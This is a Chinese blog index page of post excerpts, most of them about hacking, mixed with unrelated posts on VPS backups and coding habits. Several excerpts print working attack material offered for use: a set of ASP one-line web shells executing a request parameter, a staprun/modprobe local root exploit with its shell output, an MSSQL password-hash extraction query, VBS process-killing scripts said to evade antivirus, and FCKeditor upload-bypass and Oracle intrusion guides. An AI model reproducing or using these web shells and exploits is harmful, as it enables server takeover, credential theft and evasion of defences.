摘要： <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <%if err then%> <object runat=server id=oScriptlhn scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if res 阅读全文

摘要： 不多说，看命令：‍[b@fuckks~]$ printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTI*****="-C exploit.conf" staprun -u whatever sh-3.2# uname -aLinux xlsec 2.6.18-194.el5 #1 SMP Tue Mar 16 21:52:43 EDT 2010 i686 i686 i386 GNU/Linuxsh-3.2# cat /etc/redhat-release Red Hat Enterp 阅读全文

摘要： mssql的hash保存在表master.dbo.sysxlogins中，用select name,password from master.dbo.sysxlogins可以提取用户hash0x01004E04BE46023057E323AF27269E5B7DDCA140C98D225BDD3D06E8EFE8CFAEC02985B27B38059FA3B18349612B分解：常量部分：0×0100Salt部分：4E04BE46混合密文：023057E323AF27269E5B7DDCA140C98D225BDD3D大写字母密文：06E8EFE8CFAEC02985B27B380 阅读全文

摘要： 有人问GoDaddy的免费空间有什么用处？有必要在这里介绍拥有vps主机的站长有效利用godaddy免费空间的好方法，各位站长的网站数据是我们心目中最重要的，如何保护网站数据是在建站计划中的首要任务。godaddy的名费空间有广告，有经验的站长一般都不用来做站，不过我们可以把网站数据库上传到这个免费空间，用于备份。在vps中创建数据备份脚本1、登录SSH，创建文件backup.shvi /root/backup.sh2、粘贴以下代码到backup.sh,并保存。注释：/home/backup为本地服务器存放备份文件的目录，可以自由更改。DataBakName：数据库文件名WebBakName： 阅读全文

摘要： <%eval request("akteam")%><%execute request("akteam")%><%execute(request("akteam"))%><%If Request("akteam")<>"" Then Execute(Request("akteam"))%><%if request ("akteam")<>""then sess 阅读全文

摘要： Kill.vbs用来在cmd下结束进程，Dis.vbs用来在窗口模式下防止某进程再次启动。这两个VBS都不会被杀毒软件KILL掉，并且有一定的隐蔽性……看代码！（'为注释）Kill.vbs：复制内容到剪贴板代码:for each ps in getobject _ ("winmgmts:\\.\root\cimv2:win32_process").instances_ '涉及到WMI脚本入侵技术，我不能解释清楚！if ps.handle=wscript.arguments(0) then'判断进程的PID号是否与获得的PID号参数相等wscript. 阅读全文

摘要： 1. 充满热情：喜欢你的工作，创造性做得最好比昨天更好。2. 热爱你的代码：为人写代码，而不是为机器写代码，写干净的代码。3. 版本控制：备份代码，跟踪变更，经常commit，如果build出错，就不要commit。4. 阅读代码：在你成为一个好的作家之前，首先是一个好的读者。70%时间在读，30%在写。5. 实践实践再实践：在公司外项目实战，尽可能做得更好，以老师身份实践。6. 重构：提高你的代码质量，使代码易于理解维护和拓展。7. 跟从模式和最佳实践：面向对象设计原则，SOLID GRASP DRY KISS 等设计原则。8. TDD/BDD测试驱动开发：测试是系统的特征约束，测试是第一个 阅读全文

摘要： Fckeditor漏洞利用总结1.查看编辑器版本FCKeditor/_whatsnew.html—————————————————————————————————————————————————————————————2. Version 2.2 版本Apache+linux 环境下在上传文件后面加个.突破！测试通过。—————————————————————————————————————————————————————————————3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制，导致用户上传任意文件！将以下保 阅读全文

摘要： 破解MSSQL的HASH密码原文名称 :Microsoft SQL Server Passwords (Cracking the password hashes)原文地址 :http://www.ngssoftware.com/papers/cracking-sql-passwords.pdf作者 :David Litchfield <david@ngssoftware.com>Term : FreeXploiTAuthor : ALLyeSNODate : 2005-3-25翻译:ALLyeSNO <shellget@hotmail.com> http://blog. 阅读全文

摘要： 很多时候对于开放1521端口的Windows下Oracle数据库服务器，因为大多存在默认低权限用户dbsnmp，或者人品爆发高权限的用户 (sysdba)是默认密码或弱口令，由此可以通过Oracle的一些提权漏洞获取Oracle的最高权限，直至得到系统的SYSTEM权限。而 对于Linux下的Oracle数据库入侵，因为Linux下一般Oracle数据库都是以Oracle的独立用户在跑，所以无法获取到root权限。当 然很多WEB和数据库在同一服务器上的时候，可以导出WEBSHELL到WEB目录来获取权限。然而大部分的数据库都是独立跑在一个服务器上，以下用简单 的方式获取Oracle的shel 阅读全文